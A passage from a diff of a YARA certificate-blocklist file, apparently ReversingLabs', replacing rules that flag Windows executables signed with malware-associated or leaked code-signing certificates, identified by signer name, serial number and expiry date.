license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4e2c967b9502d9009c61831f019ba19367b866e898ca1246a1099d75ad0eb4d5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1344-L1360" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "703eccd5573fe42f03ec82887660d50e942156d840394746c90ba87d82507803" score = 75 quality = 90 tags = "INFO, FILE" @@ -10562,22 +30353,22 @@ rule REVERSINGLABS_Cert_Blocklist_0Ced87Bd70B092Cb93B182Fac32655F6 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Creator Soft Limited" and pe.signatures[i].serial=="0c:ed:87:bd:70:b0:92:cb:93:b1:82:fa:c3:26:55:f6" and 1614816000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="2d:f9:f7:eb:6c:dc:5c:a2:43:b3:31:22:e3:94:1e:25" and 1341792000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_047801D5B55C800B48411Fd8C320Ca5B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_58A541D50F9E2Fab4380C6A2Ed433B82 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "602b8c18-3dad-55b9-bb47-3f9835a049ac" + id = "19a26581-5c94-5c8d-8e3e-b2ef1d770968" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7296-L7312" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ef26b4e3c658f53f3048d10bd1b7a2a198cd402e1b7c60e84adadb4f236ccb5d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1362-L1378" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "69ddc58b6fec159d6eded8c78237a6a0626b1aedb58b0c9867b758fd09db46ad" score = 75 quality = 90 tags = "INFO, FILE" @@ -10587,22 +30378,22 @@ rule REVERSINGLABS_Cert_Blocklist_047801D5B55C800B48411Fd8C320Ca5B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LICHFIELD STUDIO GLASS LIMITED" and pe.signatures[i].serial=="04:78:01:d5:b5:5c:80:0b:48:41:1f:d8:c3:20:ca:5b" and 1614297600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="58:a5:41:d5:0f:9e:2f:ab:43:80:c6:a2:ed:43:3b:82" and 1341792000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0F0Ed5318848703405D40F7C62D0F39A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5F273626859Ae4Bc4Becbbeb71E2Ab2D : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "30e3a977-caa3-5ae0-9cd0-6b2ce62ccebd" + id = "a80dcaba-73f9-51d0-a75a-b6348fd305c6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7314-L7330" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "484932ddfe614fd5ab22361ab281cda62803c98279f938aa5237237fae6a95d6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1380-L1396" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c8be504f075041508f299b1df03d9cb9e58d9a89f49b7a926676033d18b108ba" score = 75 quality = 90 tags = "INFO, FILE" @@ -10612,22 +30403,22 @@ rule REVERSINGLABS_Cert_Blocklist_0F0Ed5318848703405D40F7C62D0F39A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SIES UPRAVLENIE PROTSESSAMI, OOO" and pe.signatures[i].serial=="0f:0e:d5:31:88:48:70:34:05:d4:0f:7c:62:d0:f3:9a" and 1614729600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="5f:27:36:26:85:9a:e4:bc:4b:ec:bb:eb:71:e2:ab:2d" and 1341792000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4E7545C9Fc5938F5198Ab9F1749Ca31C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B1Ad46Ce4Db160B348C24F66C9663178 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "d5f810ee-127a-5df0-9299-ffeaddf369ee" + id = "df34eb28-18ec-568b-8257-0b2f7959868c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7332-L7348" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f6be57eb6744ad6d239a0a2cc1ec8c39c9dfd4e4eeb3be9e699516c259f617f0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1398-L1414" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "59ce2b7a2e881853d07446b3dda74b296f2be09651364d0e131552cf76dab751" score = 75 quality = 90 tags = "INFO, FILE" @@ -10637,22 +30428,22 @@ rule REVERSINGLABS_Cert_Blocklist_4E7545C9Fc5938F5198Ab9F1749Ca31C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "For M d.o.o." and pe.signatures[i].serial=="4e:75:45:c9:fc:59:38:f5:19:8a:b9:f1:74:9c:a3:1c" and 1614297600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="b1:ad:46:ce:4d:b1:60:b3:48:c2:4f:66:c9:66:31:78" and 1341792000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7Ddd3796A427B42F2E52D7C7Af0Ca54F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_256541E204619033F8B09F9Eb7C88Ef8 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5c2e1f5b-5ff7-51d7-9642-0a527856814c" + id = "d4a5eb19-2964-5d3a-b4c5-ee4396e76814" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7350-L7366" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "804ab8c44e5d97d8e14f852d61094e90d1e3ace66316781e9e79ab46fc7db8e7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1416-L1432" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e33cedf1dd24ac73f77461de0cef25cad57909be2a69469fec450ead7da85c65" score = 75 quality = 90 tags = "INFO, FILE" @@ -10662,22 +30453,22 @@ rule REVERSINGLABS_Cert_Blocklist_7Ddd3796A427B42F2E52D7C7Af0Ca54F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Fobos" and pe.signatures[i].serial=="7d:dd:37:96:a4:27:b4:2f:2e:52:d7:c7:af:0c:a5:4f" and 1612915200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HON HAI PRECISION INDUSTRY CO. LTD." and pe.signatures[i].serial=="25:65:41:e2:04:61:90:33:f8:b0:9f:9e:b7:c8:8e:f8" and 1424303999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_03B27D7F4Ee21A462A064A17Eef70D6C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_00E8Cc18Cf100B6B27443Ef26319398734 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing GovRAT malware." author = "ReversingLabs" - id = "9d32947c-778f-5e2d-b0b1-4a17a108035e" + id = "f7e80c51-9dcf-599a-8164-c07cf4c9c5ff" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7368-L7384" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b303751e354c346f73368de94b66a960dd12efa0730d2ab14af743810669ac81" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1434-L1452" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "68e9df056109cae41d981090c7a98ddc192a445647d7475569ddbe4118e570c5" score = 75 quality = 90 tags = "INFO, FILE" @@ -10687,22 +30478,22 @@ rule REVERSINGLABS_Cert_Blocklist_03B27D7F4Ee21A462A064A17Eef70D6C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CCL TRADING LIMITED" and pe.signatures[i].serial=="03:b2:7d:7f:4e:e2:1a:46:2a:06:4a:17:ee:f7:0d:6c" and 1613952000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Syngenta" and (pe.signatures[i].serial=="00:e8:cc:18:cf:10:0b:6b:27:44:3e:f2:63:19:39:87:34" or pe.signatures[i].serial=="e8:cc:18:cf:10:0b:6b:27:44:3e:f2:63:19:39:87:34") and 1404172799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_B0A308Fc2E71Ac4Ac40677B9C27Ccbad : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_62Af28A7657Ba8Ab10Fa8E2D47250C69 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing GovRAT malware." author = "ReversingLabs" - id = "7e13e257-a264-5a40-b670-889045504acf" + id = "cba20a1b-5d24-5a1f-8f2f-8c47add846d6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7386-L7404" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "21fd7625399c939b6d03100b731709616d206a3811197af2b86991be9d89b4eb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1454-L1470" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c3c034cb4e2c65e2269fbfd9c045eb294badde60389ae62ed694ea4d61c5eb35" score = 75 quality = 90 tags = "INFO, FILE" @@ -10712,22 +30503,22 @@ rule REVERSINGLABS_Cert_Blocklist_B0A308Fc2E71Ac4Ac40677B9C27Ccbad : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Volpayk LLC" and (pe.signatures[i].serial=="00:b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad" or pe.signatures[i].serial=="b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad") and 1611705600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AFINA Fintek" and pe.signatures[i].serial=="62:af:28:a7:65:7b:a8:ab:10:fa:8e:2d:47:25:0c:69" and 1404172799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_61B11Ef9726Ab2E78132E01Bd791B336 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_04C8Eca7243208A110Dea926C7Ad89Ce : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing GovRAT malware." author = "ReversingLabs" - id = "573a024e-11f0-5cf9-8f0d-a946cdca34c5" + id = "484d0aa6-0447-5e60-946b-89b01a5e43dd" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7406-L7422" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1a8e72f31039a5a5602d0314f017a2596a23e4a796dc66167dfefc0c9790e3e3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1472-L1488" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0012436e83704397026a8b2e500e5d61915e0f4c8ad4100176e200a975562e8f" score = 75 quality = 90 tags = "INFO, FILE" @@ -10737,22 +30528,22 @@ rule REVERSINGLABS_Cert_Blocklist_61B11Ef9726Ab2E78132E01Bd791B336 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Skalari" and pe.signatures[i].serial=="61:b1:1e:f9:72:6a:b2:e7:81:32:e0:1b:d7:91:b3:36" and 1609372800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, SINGH ADITYA" and pe.signatures[i].serial=="04:c8:ec:a7:24:32:08:a1:10:de:a9:26:c7:ad:89:ce" and 1404172799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_8Fe807310D98357A59382090634B93F0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_157C3A4A6Bcf35Cf8453E6B6C0072E1D : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing GovRAT malware." author = "ReversingLabs" - id = "690e7919-0344-5bd1-849f-e7bfe2f19276" + id = "4bae3fb2-7e30-598e-8708-b985697bf63a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7424-L7442" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0ec56bd4783c854efef863050ff729fd99efa98b7b19e04e56a080ee3e75cd90" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1490-L1506" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2a68051ab6d0b967f08e44d91b9f13d75587ea0f16e2a5536ccf5898445e1a58" score = 75 quality = 90 tags = "INFO, FILE" @@ -10762,22 +30553,22 @@ rule REVERSINGLABS_Cert_Blocklist_8Fe807310D98357A59382090634B93F0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MAVE MEDIA" and (pe.signatures[i].serial=="00:8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0" or pe.signatures[i].serial=="8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0") and 1613433600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Favorite-III" and pe.signatures[i].serial=="15:7c:3a:4a:6b:cf:35:cf:84:53:e6:b6:c0:07:2e:1d" and 1404172799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_B97F66Bb221772Dc07Ef1D4Bed8F6085 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_04422F12037Bc2032521Dbb6Ae02Ea0E : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing GovRAT malware." author = "ReversingLabs" - id = "c83918d8-fe90-59dc-8f4e-0e7b10238780" + id = "0dc659e8-1f3b-5130-a776-dd9e4141f5f3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7444-L7462" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "794dc27ff9b2588d3f2c31cdb83e53616c604aa41da7d8c895034e1cf9da5dd8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1508-L1524" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "381d749d24121d6634656fd33adcda5c3e500ee77a6333f525f351a2ee589e2c" score = 75 quality = 90 tags = "INFO, FILE" @@ -10787,22 +30578,22 @@ rule REVERSINGLABS_Cert_Blocklist_B97F66Bb221772Dc07Ef1D4Bed8F6085 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "S-PRO d.o.o." and (pe.signatures[i].serial=="00:b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85" or pe.signatures[i].serial=="b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85") and 1614556800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, Muhammad Lee" and pe.signatures[i].serial=="04:42:2f:12:03:7b:c2:03:25:21:db:b6:ae:02:ea:0e" and 1404172799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Fed006Fbf85Cd1C6Ba6B4345B198E1E6 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_65Eae6C98111Dc40Bf4F962Bf27227F2 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing GovRAT malware." author = "ReversingLabs" - id = "ab84282d-9c35-5e52-a117-1d85c03cc6f4" + id = "34275efd-b941-56f5-8e1b-30a43f1936e2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7464-L7482" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0360c6760f1018f9388ef5639ab2306879134f33da12677f954fa31b8a71aa16" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1526-L1542" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "20c0f4e9783586e68ff363fe6a72398f6ea27aef5d25f98872d1203ce1a0c9bd" score = 75 quality = 90 tags = "INFO, FILE" @@ -10812,22 +30603,22 @@ rule REVERSINGLABS_Cert_Blocklist_Fed006Fbf85Cd1C6Ba6B4345B198E1E6 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LoL d.o.o." and (pe.signatures[i].serial=="00:fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6" or pe.signatures[i].serial=="fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6") and 1614297600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, BHARATH KUCHANGI" and pe.signatures[i].serial=="65:ea:e6:c9:81:11:dc:40:bf:4f:96:2b:f2:72:27:f2" and 1404172799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Aa28C9Bd16D9D304F18Af223B27Bfa1E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_12D5A4B29Fe6156D4195Fba55Ae0D9A9 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing GovRAT malware." author = "ReversingLabs" - id = "facb8bba-a8cc-5b2a-9ef6-ba290cbf9b24" + id = "45c37c98-1006-51e4-8832-b8e5c9fba416" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7484-L7502" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "feaa8d645eea46c7cbbba4ba86c92184df7515a50f1f905ab818c59079a0c96a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1544-L1560" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "860550745f6dbcd7dd0925d9b8f04e8e08e8b7c06343a4c070e131a815c42e12" score = 75 quality = 90 tags = "INFO, FILE" @@ -10837,22 +30628,22 @@ rule REVERSINGLABS_Cert_Blocklist_Aa28C9Bd16D9D304F18Af223B27Bfa1E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Tecno trade d.o.o." and (pe.signatures[i].serial=="00:aa:28:c9:bd:16:d9:d3:04:f1:8a:f2:23:b2:7b:fa:1e" or pe.signatures[i].serial=="aa:28:c9:bd:16:d9:d3:04:f1:8a:f2:23:b2:7b:fa:1e") and 1611705600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, Marc Chapon" and pe.signatures[i].serial=="12:d5:a4:b2:9f:e6:15:6d:41:95:fb:a5:5a:e0:d9:a9" and 1404172799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_19Beff8A6C129663E5E8C18953Dc1F67 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0087D60D1E2B9374Eb7A735Dce4Bbdae56 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing GovRAT malware." author = "ReversingLabs" - id = "300d9e11-9283-500e-9716-5b628ef41853" + id = "8759a40a-648e-548e-a519-bedc812aefe4" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7504-L7520" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0ec031c781ebad7447cfc53ce791aacc8f24e38f039c84e2ee547de64729ae76" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1562-L1580" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d6e0d22e926a237f1cc6b71c6f8ce01e497723032c9efba1e6af7327a786b608" score = 75 quality = 90 tags = "INFO, FILE" @@ -10862,22 +30653,22 @@ rule REVERSINGLABS_Cert_Blocklist_19Beff8A6C129663E5E8C18953Dc1F67 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CULNADY LTD LTD" and pe.signatures[i].serial=="19:be:ff:8a:6c:12:96:63:e5:e8:c1:89:53:dc:1f:67" and 1608163200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMO-K Limited Liability Company" and (pe.signatures[i].serial=="00:87:d6:0d:1e:2b:93:74:eb:7a:73:5d:ce:4b:bd:ae:56" or pe.signatures[i].serial=="87:d6:0d:1e:2b:93:74:eb:7a:73:5d:ce:4b:bd:ae:56") and 1404172799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_029685Cda1C8233D2409A31206F78F9F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0860C8A7Ed18C3F030A32722Fd2B220C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f7894a48-459b-574f-9df3-8505578de42b" + id = "335a1cd3-520a-5f0f-abda-6ec8a122de4b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7522-L7538" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d541ce73e5039541ea221f27cc4d033f0c477e41a148206c26cc39ae07c4caaa" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1582-L1598" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3c777fb157a6669bfdf3143e77f69265e09458a2b42b75b72680eb043da71e85" score = 75 quality = 90 tags = "INFO, FILE" @@ -10887,22 +30678,22 @@ rule REVERSINGLABS_Cert_Blocklist_029685Cda1C8233D2409A31206F78F9F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KOTO TRADE, dru\\xC5\\xBEba za posredovanje, d.o.o." and pe.signatures[i].serial=="02:96:85:cd:a1:c8:23:3d:24:09:a3:12:06:f7:8f:9f" and 1612396800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, Tony Yeh" and pe.signatures[i].serial=="08:60:c8:a7:ed:18:c3:f0:30:a3:27:22:fd:2b:22:0c" and 